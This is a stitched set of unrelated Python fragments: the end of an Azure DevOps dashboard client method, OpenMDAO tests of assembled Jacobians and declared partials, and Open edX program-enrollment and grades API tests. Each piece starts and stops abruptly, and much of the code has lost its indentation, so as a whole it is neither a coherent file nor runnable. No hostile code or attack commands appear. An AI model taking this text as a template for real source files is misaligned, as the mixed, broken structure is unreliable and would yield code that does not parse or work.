:rtype: :class:`<WidgetsVersionedList> <azure.devops.v5_1.dashboard.models.WidgetsVersionedList>`
"""
project = None
team = None
if team_context is not None:
if team_context.project_id:
project = team_context.project_id
else:
project = team_context.project
if team_context.team_id:
team = team_context.team_id
else:
team = team_context.team
route_values = {}
if project is not None:
route_values['project'] = self._serialize.url('project', project, 'string')
if team is not None:
route_values['team'] = self._serialize.url('team', team, 'string')
if dashboard_id is not None:
route_values['dashboardId'] = self._serialize.url('dashboard_id', dashboard_id, 'str')
response = self._send(http_method='GET',
location_id='bdcff53a-8355-4172-a00a-40497ea23afc',
version='5.1-preview.2',
route_values=route_values)
response_object = models.WidgetsVersionedList()
response_object.widgets = self._deserialize('[Widget]', self._unwrap_collection(response))
response_object.eTag = response.headers.get('ETag')
return response_object
def replace_widget(self, widget, team_context, dashboard_id, widget_id):
"""ReplaceWidget.
[Preview API] Override the state of the specified widget.
:param :class:`<Widget> <azure.devops.v5_1.dashboard.models.Widget>` widget: State to be written for the widget.
:param :class:`<TeamContext> <azure.devops.v5_1.dashboard.models.TeamContext>` team_context: The team context for the operation
| |
prob.run_model()
of = ['con1', 'con2']
wrt = ['x', 'z']
# Make sure we don't get a size mismatch.
derivs = prob.compute_totals(of=of, wrt=wrt)
def test_assembled_jac_bad_key(self):
# this test fails if AssembledJacobian._update sets in_start with 'output' instead of 'input'
prob = Problem()
prob.model = Group(assembled_jac_type='dense')
prob.model.add_subsystem('indep', IndepVarComp('x', 1.0))
prob.model.add_subsystem('C1', ExecComp('c=a*2.0+b', a=0., b=0., c=0.))
c2 = prob.model.add_subsystem('C2', ExecComp('d=a*2.0+b+c', a=0., b=0., c=0., d=0.))
c3 = prob.model.add_subsystem('C3', ExecComp('ee=a*2.0', a=0., ee=0.))
prob.model.nonlinear_solver = NewtonSolver(solve_subsystems=False)
prob.model.linear_solver = DirectSolver(assemble_jac=True)
prob.model.connect('indep.x', 'C1.a')
prob.model.connect('indep.x', 'C2.a')
prob.model.connect('C1.c', 'C2.b')
prob.model.connect('C2.d', 'C3.a')
prob.set_solver_print(level=0)
prob.setup()
prob.run_model()
assert_rel_error(self, prob['C3.ee'], 8.0, 0000.1)
def test_assembled_jacobian_submat_indexing_dense(self):
prob = Problem(model=Group(assembled_jac_type='dense'))
indeps = prob.model.add_subsystem('indeps', IndepVarComp())
indeps.add_output('x', 1.0)
indeps.add_output('y', 5.0)
indeps.add_output('z', 9.0)
G1 = prob.model.add_subsystem('G1', Group())
G1.add_subsystem('C1', ExecComp('y=2.0*x*x'))
G1.add_subsystem('C2', ExecComp('y=3.0*x*x'))
prob.model.nonlinear_solver = NewtonSolver(solve_subsystems=False)
G1.linear_solver = DirectSolver(assemble_jac=True)
# before the fix, we got bad offsets into the _ext_mtx matrix.
# to get entries in _ext_mtx, there must be at least one connection
# to an input in the system that owns the AssembledJacobian, from
# a source that is outside of that system. In this case, the 'indeps'
# system is outside of the 'G1' group which owns the AssembledJacobian.
prob.model.connect('indeps.y', 'G1.C1.x')
prob.model.connect('indeps.z', 'G1.C2.x')
prob.setup()
prob.run_model()
assert_rel_error(self, prob['G1.C1.y'], 50.0)
assert_rel_error(self, prob['G1.C2.y'], 243.0)
def test_assembled_jacobian_submat_indexing_csc(self):
prob = Problem(model=Group(assembled_jac_type='dense'))
indeps = prob.model.add_subsystem('indeps', IndepVarComp())
indeps.add_output('x', 1.0)
indeps.add_output('y', 5.0)
indeps.add_output('z', 9.0)
G1 = prob.model.add_subsystem('G1', Group())
G1.add_subsystem('C1', ExecComp('y=2.0*x*x'))
G1.add_subsystem('C2', ExecComp('y=3.0*x*x'))
# prob.model.nonlinear_solver = NewtonSolver(solve_subsystems=False)
prob.model.linear_solver = DirectSolver(assemble_jac=True)
G1.linear_solver = DirectSolver(assemble_jac=True)
G1.nonlinear_solver = NewtonSolver(solve_subsystems=False)
# before the fix, we got bad offsets into the _ext_mtx matrix.
# to get entries in _ext_mtx, there must be at least one connection
# to an input in the system that owns the AssembledJacobian, from
# a source that is outside of that system. In this case, the 'indeps'
# system is outside of the 'G1' group which owns the AssembledJacobian.
prob.model.connect('indeps.y', 'G1.C1.x')
prob.model.connect('indeps.z', 'G1.C2.x')
prob.setup()
prob.run_model()
assert_rel_error(self, prob['G1.C1.y'], 50.0)
assert_rel_error(self, prob['G1.C2.y'], 243.0)
def test_declare_partial_reference(self):
# Test for a bug where declare_partials is given an array reference
# that compute also uses and could get corrupted
class Comp(ExplicitComponent):
def setup(self):
self.add_input('x', val=1.0, shape=2)
self.add_output('y', val=1.0, shape=2)
self.val = 2 * np.ones(2)
self.rows = np.arange(2)
self.cols = np.arange(2)
self.declare_partials(
'y', 'x', val=self.val, rows=self.rows, cols=self.cols)
def compute(self, inputs, outputs):
outputs['y'][:] = 0.
np.add.at(
outputs['y'], self.rows,
self.val * inputs['x'][self.cols])
prob = Problem(model=Comp())
prob.setup()
prob.run_model()
assert_rel_error(self, prob['y'], 2 * np.ones(2))
def test_declare_partials_row_col_size_mismatch(self):
# Make sure we have clear error messages.
class Comp1(ExplicitComponent):
def setup(self):
self.add_input('x', val=np.array((2, 2)))
self.add_output('y', val=np.array((2, 2)))
self.declare_partials('y', 'x', rows=np.array([0, 1]), cols=np.array([0]))
def compute(self, inputs, outputs):
pass
class Comp2(ExplicitComponent):
def setup(self):
self.add_input('x', val=np.array((2, 2)))
self.add_output('y', val=np.array((2, 2)))
self.declare_partials('y', 'x', rows=np.array([0]), cols=np.array([0, 1]))
def compute(self, inputs, outputs):
pass
prob = Problem()
model = prob.model
model.add_subsystem('comp', Comp1())
msg = "Comp1 \(comp\): d\(y\)/d\(x\): declare_partials has been called with rows and cols, which" + \
" should be arrays of equal length, but rows is length 2 while " + \
"cols is length 1."
with self.assertRaisesRegex(RuntimeError, msg):
prob.setup()
prob = Problem()
model = prob.model
model.add_subsystem('comp', Comp2())
msg = "Comp2 \(comp\): d\(y\)/d\(x\): declare_partials has been called with rows and cols, which" + \
" should be arrays of equal length, but rows is length 1 while " + \
"cols is length 2."
with self.assertRaisesRegex(RuntimeError, msg):
prob.setup()
    def test_assembled_jacobian_unsupported_cases(self):
        # Matrix-free components (those overriding apply_linear or
        # compute_jacvec_product) cannot live under an AssembledJacobian.
        # Each scenario below must raise the same error; the final scenario
        # confirms a regular component does NOT raise.
        class ParaboloidApply(ImplicitComponent):
            def setup(self):
                self.add_input('x', val=0.0)
                self.add_input('y', val=0.0)
                self.add_output('f_xy', val=0.0)
            def linearize(self, inputs, outputs, jacobian):
                return
            def apply_linear(self, inputs, outputs, d_inputs, d_outputs, d_residuals,
                             mode):
                # NOTE(review): this body is never executed in this test —
                # run_model raises before any linear solve — so its references
                # to inputs['a'] / outputs['x'] (undeclared here) are inert.
                d_residuals['x'] += (np.exp(outputs['x']) - 2*inputs['a']**2 * outputs['x'])*d_outputs['x']
                d_residuals['x'] += (-2 * inputs['a'] * outputs['x']**2)*d_inputs['a']
        # One level deep
        prob = Problem()
        model = prob.model = Group(assembled_jac_type='dense')
        model.linear_solver = DirectSolver(assemble_jac=True)
        model.add_subsystem('p1', IndepVarComp('x', val=1.0))
        model.add_subsystem('p2', IndepVarComp('y', val=1.0))
        model.add_subsystem('comp', ParaboloidApply())
        model.connect('p1.x', 'comp.x')
        model.connect('p2.y', 'comp.y')
        prob.setup()
        msg = "AssembledJacobian not supported for matrix-free subcomponent."
        with self.assertRaisesRegex(Exception, msg):
            prob.run_model()
        # Nested: the matrix-free component sits inside a subgroup of the
        # system that owns the assembled jacobian.
        prob = Problem()
        model = prob.model = Group(assembled_jac_type='dense')
        model.linear_solver = DirectSolver(assemble_jac=True)
        sub = model.add_subsystem('sub', Group())
        model.add_subsystem('p1', IndepVarComp('x', val=1.0))
        model.add_subsystem('p2', IndepVarComp('y', val=1.0))
        sub.add_subsystem('comp', ParaboloidApply())
        model.connect('p1.x', 'sub.comp.x')
        model.connect('p2.y', 'sub.comp.y')
        prob.setup()
        msg = "AssembledJacobian not supported for matrix-free subcomponent."
        with self.assertRaisesRegex(Exception, msg):
            prob.run_model()
        # Try a component that is derived from a matrix-free one; the
        # inherited apply_linear must still be detected.
        class FurtherDerived(ParaboloidApply):
            def do_nothing(self):
                pass
        prob = Problem()
        model = prob.model = Group(assembled_jac_type='dense')
        model.linear_solver = DirectSolver(assemble_jac=True)
        model.add_subsystem('p1', IndepVarComp('x', val=1.0))
        model.add_subsystem('p2', IndepVarComp('y', val=1.0))
        model.add_subsystem('comp', FurtherDerived())
        model.connect('p1.x', 'comp.x')
        model.connect('p2.y', 'comp.y')
        prob.setup()
        msg = "AssembledJacobian not supported for matrix-free subcomponent."
        with self.assertRaisesRegex(Exception, msg):
            prob.run_model()
        # Make sure regular comps don't give an error.
        prob = Problem()
        model = prob.model = Group(assembled_jac_type='dense')
        model.linear_solver = DirectSolver(assemble_jac=True)
        model.add_subsystem('p1', IndepVarComp('x', val=1.0))
        model.add_subsystem('p2', IndepVarComp('y', val=1.0))
        model.add_subsystem('comp', Paraboloid())
        model.connect('p1.x', 'comp.x')
        model.connect('p2.y', 'comp.y')
        prob.setup()
        prob.final_setup()
        class ParaboloidJacVec(Paraboloid):
            def linearize(self, inputs, outputs, jacobian):
                return
            def compute_jacvec_product(self, inputs, d_inputs, d_outputs, d_residuals, mode):
                # NOTE(review): also never executed — run_model raises first.
                d_residuals['x'] += (np.exp(outputs['x']) - 2*inputs['a']**2 * outputs['x'])*d_outputs['x']
                d_residuals['x'] += (-2 * inputs['a'] * outputs['x']**2)*d_inputs['a']
        # One level deep, explicit matrix-free (compute_jacvec_product) variant.
        prob = Problem()
        model = prob.model = Group(assembled_jac_type='dense')
        model.linear_solver = DirectSolver(assemble_jac=True)
        model.add_subsystem('p1', IndepVarComp('x', val=1.0))
        model.add_subsystem('p2', IndepVarComp('y', val=1.0))
        model.add_subsystem('comp', ParaboloidJacVec())
        model.connect('p1.x', 'comp.x')
        model.connect('p2.y', 'comp.y')
        prob.setup()
        msg = "AssembledJacobian not supported for matrix-free subcomponent."
        with self.assertRaisesRegex(Exception, msg):
            prob.run_model()
def test_access_undeclared_subjac(self):
class Undeclared(ExplicitComponent):
def setup(self):
self.add_input('x', val=0.0)
self.add_output('y', val=0.0)
def compute(self, inputs, outputs):
pass
def compute_partials(self, inputs, partials):
partials['y', 'x'] = 1.0
prob = Problem()
model = prob.model
model.add_subsystem('p1', IndepVarComp('x', val=1.0))
model.add_subsystem('comp', Undeclared())
model.connect('p1.x', 'comp.x')
prob.setup()
prob.run_model()
msg = 'Variable name pair \("{}", "{}"\) must first be declared.'
with self.assertRaisesRegex(KeyError, msg.format('y', 'x')):
J = prob.compute_totals(of=['comp.y'], wrt=['p1.x'])
def test_one_src_2_tgts_with_src_indices_densejac(self):
size = 4
prob = Problem(model=Group(assembled_jac_type='dense'))
indeps = prob.model.add_subsystem('indeps', IndepVarComp('x', np.ones(size)))
G1 = prob.model.add_subsystem('G1', Group())
G1.add_subsystem('C1', ExecComp('z=2.0*y+3.0*x', x=np.zeros(size//2), y=np.zeros(size//2),
z=np.zeros(size//2)))
prob.model.linear_solver = DirectSolver(assemble_jac=True)
prob.model.add_objective('G1.C1.z')
prob.model.add_design_var('indeps.x')
prob.model.connect('indeps.x', 'G1.C1.x', src_indices=[0,1])
prob.model.connect('indeps.x', 'G1.C1.y', src_indices=[2,3])
prob.setup()
prob.run_model()
J = prob.compute_totals(of=['G1.C1.z'], wrt=['indeps.x'])
assert_rel_error(self, J['G1.C1.z', 'indeps.x'], np.array([[ 3., 0., 2., 0.],
[-0., 3., 0., 2.]]), .0001)
def test_one_src_2_tgts_csc_error(self):
size = 10
prob = Problem()
indeps = prob.model.add_subsystem('indeps', IndepVarComp('x', np.ones(size)))
G1 = prob.model.add_subsystem('G1', Group())
G1.add_subsystem('C1', ExecComp('z=2.0*y+3.0*x', x=np.zeros(size), y=np.zeros(size),
z=np.zeros(size)))
prob.model.linear_solver = DirectSolver(assemble_jac=True)
prob.model.add_objective('G1.C1.z')
prob.model.add_design_var('indeps.x')
prob.model.connect('indeps.x', 'G1.C1.x')
prob.model.connect('indeps.x', 'G1.C1.y')
prob.setup(mode='fwd')
prob.run_model()
J = prob.compute_totals(of=['G1.C1.z'], wrt=['indeps.x'])
assert_rel_error(self, J['G1.C1.z', 'indeps.x'], np.eye(10)*5.0, .0001)
def test_dict_properties(self):
# Make sure you can use the partials variable passed to compute_partials as a dict
prob = Problem()
indeps = prob.model.add_subsystem('indeps', IndepVarComp(), promotes=['*'])
indeps.add_output('x', .5)
indeps.add_output('y', 10.0)
comp = SimpleCompWithPrintPartials()
prob.model.add_subsystem('paraboloid', comp, promotes_inputs=['x', 'y'])
prob.driver = ScipyOptimizeDriver()
prob.driver.options['optimizer'] = 'SLSQP'
prob.model.add_design_var('x', lower=-50, upper=50)
prob.model.add_design_var('y', lower=-50, upper=50)
prob.model.add_objective('paraboloid.f_xy')
prob.setup()
prob.run_driver()
expected = [
(('paraboloid.f_xy', 'paraboloid.f_xy'),[-1.]),
(('paraboloid.f_xy', 'paraboloid.x'),[[0.]]),
(('paraboloid.f_xy', 'paraboloid.y'),[[0.]]),
]
self.assertEqual(sorted(comp.partials_name_pairs), sorted(e[0] for e in sorted(expected)))
self.assertEqual(sorted(comp.partials_name_pairs),
sorted(e[0] for e in sorted(expected)))
for act, exp in zip(
[e[1] for e in sorted(comp.partials_values)],
[e[1] for e in sorted(expected)],
):
assert_rel_error(self,act,exp, 1e-5)
class MySparseComp(ExplicitComponent):
    """Two-in/one-out component whose partials are declared in sparse
    (rows/cols list) format."""

    def setup(self):
        self.add_input('y', np.zeros(2))
        self.add_input('x', np.zeros(2))
        self.add_output('z', np.zeros(2))
        # partials use sparse list format
        self.declare_partials('z', 'x', rows=[0, 1], cols=[0, 1])
        self.declare_partials('z', 'y', rows=[0, 1], cols=[1, 0])

    def compute(self, inputs, outputs):
        x, y = inputs['x'], inputs['y']
        outputs['z'] = np.array([3.0 * x[0] ** 3 + 4.0 * y[1] ** 2,
                                 5.0 * x[1] ** 2 * y[0]])

    def compute_partials(self, inputs, partials):
        x, y = inputs['x'], inputs['y']
        # values correspond positionally to the declared rows/cols entries
        partials['z', 'x'] = np.array([9.0 * x[0] ** 2, 10.0 * x[1] * y[0]])
        partials['z', 'y'] = np.array([8.0 * y[1], 5.0 * x[1] ** 2])
class MyDenseComp(ExplicitComponent):
    """Same math as MySparseComp, but with dense declared partials."""

    def setup(self):
        self.add_input('y', np.zeros(2))
        self.add_input('x', np.zeros(2))
        self.add_output('z', np.zeros(2))
        # partials are dense
        self.declare_partials('z', 'x')
        self.declare_partials('z', 'y')

    def compute(self, inputs, outputs):
        x, y = inputs['x'], inputs['y']
        outputs['z'] = np.array([3.0 * x[0] ** 3 + 4.0 * y[1] ** 2,
                                 5.0 * x[1] ** 2 * y[0]])

    def compute_partials(self, inputs, partials):
        x, y = inputs['x'], inputs['y']
        partials['z', 'x'] = np.array([[9.0 * x[0] ** 2, 0.0],
                                       [0.0, 10.0 * x[1] * y[0]]])
        partials['z', 'y'] = np.array([[0.0, 8.0 * y[1]],
                                       [5.0 * x[1] ** 2, 0.0]])
class OverlappingPartialsTestCase(unittest.TestCase):
    """Cases where multiple inputs (or repeated src_indices) overlap onto a
    single source, checking the assembled internal matrix directly."""

    def test_repeated_src_indices_csc(self):
        size = 2
        p = Problem()
        p.model.add_subsystem('indeps', IndepVarComp('x', np.ones(size)))
        p.model.add_subsystem('C1', ExecComp('z=3.0*x[0]**3 + 2.0*x[1]**2',
                                             x=np.zeros(size)))
        p.model.options['assembled_jac_type'] = 'csc'
        p.model.linear_solver = DirectSolver(assemble_jac=True)
        # both entries of C1.x come from the same source index
        p.model.connect('indeps.x', 'C1.x', src_indices=[1, 1])
        p.setup()
        p.run_model()
        p.compute_totals(of=['C1.z'], wrt=['indeps.x'], return_format='array')
        np.testing.assert_almost_equal(
            p.model._assembled_jac._int_mtx._matrix.toarray(),
            np.array([[-1., 0., 0.],
                      [0., -1., 0.],
                      [0., 13., -1.]]))

    def test_repeated_src_indices_dense(self):
        size = 2
        p = Problem()
        p.model.add_subsystem('indeps', IndepVarComp('x', np.ones(size)))
        p.model.add_subsystem('C1', ExecComp('z=3.0*x[0]**3 + 2.0*x[1]**2',
                                             x=np.zeros(size)))
        p.model.options['assembled_jac_type'] = 'dense'
        p.model.linear_solver = DirectSolver(assemble_jac=True)
        # both entries of C1.x come from the same source index
        p.model.connect('indeps.x', 'C1.x', src_indices=[1, 1])
        p.setup()
        p.run_model()
        p.compute_totals(of=['C1.z'], wrt=['indeps.x'], return_format='array')
        np.testing.assert_almost_equal(
            p.model._assembled_jac._int_mtx._matrix,
            np.array([[-1., 0., 0.],
                      [0., -1., 0.],
                      [0., 13., -1.]]))

    def test_multi_inputs_same_src_dense_comp(self):
        p = Problem()
        p.model.add_subsystem('indeps', IndepVarComp('x', np.ones(2)))
        p.model.add_subsystem('C1', MyDenseComp())
        p.model.options['assembled_jac_type'] = 'csc'
        p.model.linear_solver = DirectSolver(assemble_jac=True)
        # two inputs of C1 fed from the one source
        p.model.connect('indeps.x', ('C1.x', 'C1.y'))
        p.setup()
        p.run_model()
        p.compute_totals(of=['C1.z'], wrt=['indeps.x'], return_format='array')
        np.testing.assert_almost_equal(
            p.model._assembled_jac._int_mtx._matrix.toarray(),
            np.array([[-1., 0., 0., 0.],
                      [0., -1., 0., 0.],
                      [9., 8., -1., 0.],
                      [5., 10., 0., -1.]]))
| |
"""
update = True
create = True
def request(self, path, data, **kwargs):
return self.client.put(path, data, format='json', **kwargs)
@ddt.ddt
class MultiprogramEnrollmentsTest(EnrollmentsDataMixin, APITestCase):
    """ Tests for the Multiple Program with same course scenario """

    @classmethod
    def setUpClass(cls):
        super().setUpClass()
        # A second program whose curriculum contains the same course as the
        # mixin-provided program.
        cls.another_curriculum_uuid = UUID('bbbbbbbb-8888-9999-7777-666666666666')
        cls.another_curriculum = CurriculumFactory(
            uuid=cls.another_curriculum_uuid,
            courses=[cls.course]
        )
        cls.another_program_uuid = UUID(cls.program_uuid_tmpl.format(99))
        cls.another_program = ProgramFactory(
            uuid=cls.another_program_uuid,
            authoring_organizations=[cls.catalog_org],
            curricula=[cls.another_curriculum]
        )
        cls.external_user_key = 'aabbcc'
        cls.user = UserFactory.create(username='multiprogram_user')

    def setUp(self):
        super().setUp()
        self.set_program_in_catalog_cache(self.another_program_uuid, self.another_program)
        self.client.login(username=self.global_staff.username, password=self.password)

    def get_program_url(self, program_uuid):
        """Return the program-enrollments URL for ``program_uuid``."""
        return reverse('programs_api:v1:program_enrollments', kwargs={
            'program_uuid': program_uuid
        })

    def get_program_course_url(self, program_uuid, course_id):
        """Return the program-course-enrollments URL for the given program/course."""
        return reverse('programs_api:v1:program_course_enrollments', kwargs={
            'program_uuid': program_uuid,
            'course_id': course_id
        })

    def write_program_enrollment(
        self,
        method,
        program_uuid,
        curriculum_uuid,
        enrollment_status,
        existing_user
    ):
        """ Create or update the program enrollment through API """
        write_data = [{
            'status': enrollment_status,
            REQUEST_STUDENT_KEY: self.external_user_key,
            'curriculum_uuid': str(curriculum_uuid)
        }]
        url = self.get_program_url(program_uuid=program_uuid)
        # With no platform user linked yet, the patched user lookup returns
        # None for every external key; a defaultdict models that.
        mock_user = defaultdict(lambda: None)
        if existing_user:
            mock_user = {self.external_user_key: self.user}
        with mock.patch(
            _get_users_patch_path,
            autospec=True,
            return_value=mock_user,
        ):
            response = getattr(self.client, method)(
                url,
                json.dumps(write_data),
                content_type='application/json'
            )
        return response

    def write_program_course_enrollment(
        self,
        method,
        program_uuid,
        course_id,
        enrollment_status
    ):
        """ Create or update the program course enrollment through API """
        course_post_data = [{
            'student_key': self.external_user_key,
            'status': enrollment_status
        }]
        course_url = self.get_program_course_url(program_uuid, course_id)
        response = getattr(self.client, method)(
            course_url,
            json.dumps(course_post_data),
            content_type='application/json'
        )
        return response

    def link_user_social_auth(self):
        """ Create the UserSocialAuth record to trigger the linkage django signal """
        SAMLProviderConfigFactory(
            organization=self.lms_org,
            slug=self.organization_key
        )
        UserSocialAuth.objects.create(
            user=self.user,
            uid=f'{self.organization_key}:{self.external_user_key}',
            provider=self.organization_key
        )

    @ddt.data(True, False)
    def test_enrollment_in_same_course_multi_program(self, existing_user):
        """A learner may be course-enrolled via a second program once the
        first program's course enrollment is inactive."""
        response = self.write_program_enrollment(
            'post', self.program_uuid, self.curriculum_uuid, 'enrolled', existing_user
        )
        assert response.status_code == status.HTTP_200_OK
        response = self.write_program_course_enrollment(
            'post', self.program_uuid, self.course_id, 'active'
        )
        assert response.status_code == status.HTTP_200_OK
        # Deactivate the first program's enrollments...
        response = self.write_program_enrollment(
            'put', self.program_uuid, self.curriculum_uuid, 'canceled', existing_user
        )
        assert response.status_code == status.HTTP_200_OK
        response = self.write_program_course_enrollment(
            'put', self.program_uuid, self.course_id, 'inactive'
        )
        assert response.status_code == status.HTTP_200_OK
        # ...then enroll through the second program into the same course.
        response = self.write_program_enrollment(
            'post', self.another_program_uuid, self.another_curriculum_uuid, 'enrolled', existing_user
        )
        assert response.status_code == status.HTTP_200_OK
        response = self.write_program_course_enrollment(
            'post', self.another_program_uuid, self.course_id, 'active')
        assert response.status_code == status.HTTP_200_OK
        if not existing_user:
            # Linking the social-auth identity should realize the enrollment.
            self.link_user_social_auth()
        program_course_enrollment = ProgramCourseEnrollment.objects.get(
            program_enrollment__external_user_key=self.external_user_key,
            program_enrollment__program_uuid=self.another_program_uuid
        )
        assert program_course_enrollment.program_enrollment.user is not None

    @ddt.data(True, False)
    @mock.patch('lms.djangoapps.program_enrollments.api.writing.logger')
    def test_enrollment_in_same_course_both_program_enrollments_active(self, existing_user, mock_log):
        """Two simultaneously-active course enrollments for the same course
        across programs must be rejected as a conflict."""
        response = self.write_program_enrollment(
            'post', self.program_uuid, self.curriculum_uuid, 'enrolled', existing_user
        )
        assert response.status_code == status.HTTP_200_OK
        response = self.write_program_course_enrollment(
            'post', self.program_uuid, self.course_id, 'active'
        )
        assert response.status_code == status.HTTP_200_OK
        response = self.write_program_enrollment(
            'post', self.another_program_uuid, self.another_curriculum_uuid, 'enrolled', existing_user
        )
        assert response.status_code == status.HTTP_200_OK
        response = self.write_program_course_enrollment(
            'post', self.another_program_uuid, self.course_id, 'active'
        )
        # Fix: use the DRF status constant instead of a bare 422 literal, for
        # consistency with every other status assertion in this module.
        assert response.status_code == status.HTTP_422_UNPROCESSABLE_ENTITY
        mock_log.error.assert_called_with(
            'Detected conflicting active ProgramCourseEnrollment. This is happening on'
            ' The program_uuid [{}] with course_key [{}] for external_user_key [{}]'.format(
                self.another_program_uuid,
                self.course_id,
                self.external_user_key
            )
        )
        expected_results = {self.external_user_key: CourseStatuses.CONFLICT}
        self.assertDictEqual(expected_results, response.data)
class ProgramCourseGradesGetTests(EnrollmentsDataMixin, APITestCase):
    """
    Tests for GET calls to the Program Course Grades API.
    """
    # URL name resolved via the mixin's get_url() helper.
    view_name = 'programs_api:v1:program_course_grades'
    def test_401_if_unauthenticated(self):
        """Anonymous requests are rejected with 401."""
        url = self.get_url(course_id=self.course_id)
        response = self.client.get(url)
        assert response.status_code == status.HTTP_401_UNAUTHORIZED
    def test_403_if_not_staff(self):
        """Authenticated non-staff users are rejected with 403."""
        self.log_in_non_staff()
        url = self.get_url(course_id=self.course_id)
        response = self.client.get(url)
        assert response.status_code == status.HTTP_403_FORBIDDEN
    def test_404_not_found(self):
        """An unknown program UUID yields 404."""
        fake_program_uuid = UUID(self.program_uuid_tmpl.format(99))
        self.log_in_staff()
        url = self.get_url(program_uuid=fake_program_uuid, course_id=self.course_id)
        response = self.client.get(url)
        assert response.status_code == status.HTTP_404_NOT_FOUND
    def test_204_no_grades_to_return(self):
        """No grades at all -> 204 with an empty results list."""
        self.log_in_staff()
        url = self.get_url(course_id=self.course_id)
        with self.patch_grades_with({}):
            response = self.client.get(url)
        assert response.status_code == status.HTTP_204_NO_CONTENT
        assert response.data['results'] == []
    def test_200_grades_with_no_exceptions(self):
        """Every grade loads cleanly -> 200 with one record per student."""
        other_student = UserFactory.create(username='other_student')
        self.create_program_and_course_enrollments('student-key', user=self.student)
        self.create_program_and_course_enrollments('other-student-key', user=other_student)
        # Maps user -> (grade, exception); a None exception means success.
        mock_grades_by_user = {
            self.student: (
                self.mock_grade(),
                None
            ),
            other_student: (
                self.mock_grade(percent=40.0, passed=False, letter_grade='F'),
                None
            ),
        }
        self.log_in_staff()
        url = self.get_url(course_id=self.course_id)
        with self.patch_grades_with(mock_grades_by_user):
            response = self.client.get(url)
        assert response.status_code == status.HTTP_200_OK
        expected_results = [
            {
                'student_key': 'student-key',
                'passed': True,
                'percent': 75.0,
                'letter_grade': 'B',
            },
            {
                'student_key': 'other-student-key',
                'passed': False,
                'percent': 40.0,
                'letter_grade': 'F',
            },
        ]
        assert response.data['results'] == expected_results
    def test_207_grades_with_some_exceptions(self):
        """A mix of successes and failures -> 207 Multi-Status."""
        other_student = UserFactory.create(username='other_student')
        self.create_program_and_course_enrollments('student-key', user=self.student)
        self.create_program_and_course_enrollments('other-student-key', user=other_student)
        mock_grades_by_user = {
            self.student: (None, Exception('Bad Data')),
            other_student: (
                self.mock_grade(percent=40.0, passed=False, letter_grade='F'),
                None,
            ),
        }
        self.log_in_staff()
        url = self.get_url(course_id=self.course_id)
        with self.patch_grades_with(mock_grades_by_user):
            response = self.client.get(url)
        assert response.status_code == status.HTTP_207_MULTI_STATUS
        expected_results = [
            {
                'student_key': 'student-key',
                'error': 'Bad Data',
            },
            {
                'student_key': 'other-student-key',
                'passed': False,
                'percent': 40.0,
                'letter_grade': 'F',
            },
        ]
        assert response.data['results'] == expected_results
    def test_422_grades_with_only_exceptions(self):
        """Every grade failing to load -> 422 with per-student errors."""
        other_student = UserFactory.create(username='other_student')
        self.create_program_and_course_enrollments('student-key', user=self.student)
        self.create_program_and_course_enrollments('other-student-key', user=other_student)
        mock_grades_by_user = {
            self.student: (None, Exception('Bad Data')),
            other_student: (None, Exception('Timeout')),
        }
        self.log_in_staff()
        url = self.get_url(course_id=self.course_id)
        with self.patch_grades_with(mock_grades_by_user):
            response = self.client.get(url)
        assert response.status_code == status.HTTP_422_UNPROCESSABLE_ENTITY
        expected_results = [
            {
                'student_key': 'student-key',
                'error': 'Bad Data',
            },
            {
                'student_key': 'other-student-key',
                'error': 'Timeout',
            },
        ]
        assert response.data['results'] == expected_results
    @staticmethod
    def patch_grades_with(grades_by_user):
        """
        Create a patcher the CourseGradeFactory to use the `grades_by_user`
        to determine the grade for each user.
        Arguments:
            grades_by_user: dict[User: (CourseGrade, Exception)]
        """
        # Mirrors CourseGradeFactory.iter's (user, grade, exception) tuples.
        def patched_iter(self, users, course_key):  # pylint: disable=unused-argument
            return [
                (user, grades_by_user[user][0], grades_by_user[user][1])
                for user in users
            ]
        return mock.patch.object(CourseGradeFactory, 'iter', new=patched_iter)
    @staticmethod
    def mock_grade(percent=75.0, passed=True, letter_grade='B'):
        """Build a grade-like mock with the three attributes the view reads."""
        return mock.MagicMock(percent=percent, passed=passed, letter_grade=letter_grade)
@ddt.ddt
class UserProgramReadOnlyAccessGetTests(EnrollmentsDataMixin, APITestCase):
    """
    Tests for the UserProgramReadonlyAccess view class.

    Exercises the endpoint for anonymous users, global staff, course staff
    (single course, multiple courses, non-program courses) and learners.
    """
    view_name = 'programs_api:v1:user_program_readonly_access'

    @classmethod
    def setUpClass(cls):
        """Create shared program fixtures and a course-staff user enrolled in the course."""
        super().setUpClass()
        cls.mock_program_data = [
            {'uuid': cls.program_uuid_tmpl.format(11), 'marketing_slug': 'garbage-program', 'type': 'masters'},
            {'uuid': cls.program_uuid_tmpl.format(22), 'marketing_slug': 'garbage-study', 'type': 'micromaster'},
            {'uuid': cls.program_uuid_tmpl.format(33), 'marketing_slug': 'garbage-life', 'type': 'masters'},
        ]
        # NOTE(review): an anonymized `<PASSWORD>` placeholder (a syntax error) was
        # replaced with the shared test password used elsewhere in this class
        # (`self.password` at login time) — confirm it matches the mixin's value.
        cls.course_staff = InstructorFactory.create(password=cls.password, course_key=cls.course_id)
        cls.date = timezone.make_aware(datetime(2013, 1, 22))
        CourseEnrollmentFactory(
            course_id=cls.course_id,
            user=cls.course_staff,
            created=cls.date,
        )

    def test_401_if_anonymous(self):
        """An unauthenticated request is rejected with 401."""
        response = self.client.get(reverse(self.view_name))
        assert status.HTTP_401_UNAUTHORIZED == response.status_code

    @ddt.data(
        ('masters', 2),
        ('micromaster', 1)
    )
    @ddt.unpack
    def test_global_staff(self, program_type, expected_data_size):
        """Global staff see every program of the requested type."""
        self.client.login(username=self.global_staff.username, password=self.password)
        mock_return_value = [program for program in self.mock_program_data if program['type'] == program_type]

        with mock.patch(
            _VIEW_PATCH_FORMAT.format('get_programs_by_type'),
            autospec=True,
            return_value=mock_return_value
        ) as mock_get_programs_by_type:
            response = self.client.get(reverse(self.view_name) + '?type=' + program_type)

        assert status.HTTP_200_OK == response.status_code
        assert len(response.data) == expected_data_size
        mock_get_programs_by_type.assert_called_once_with(response.wsgi_request.site, program_type)

    def test_course_staff(self):
        """Course staff see the programs containing the course they administer."""
        self.client.login(username=self.course_staff.username, password=self.password)

        with mock.patch(
            _VIEW_PATCH_FORMAT.format('get_programs'),
            autospec=True,
            side_effect=[[self.mock_program_data[0]], []]
        ) as mock_get_programs:
            response = self.client.get(reverse(self.view_name) + '?type=masters')

        assert status.HTTP_200_OK == response.status_code
        assert len(response.data) == 1
        mock_get_programs.assert_has_calls([
            mock.call(course=self.course_id),
            mock.call(uuids=[]),
        ], any_order=True)

    def _enroll_user_into_course_as_course_staff(self, user, course_key_string):
        """
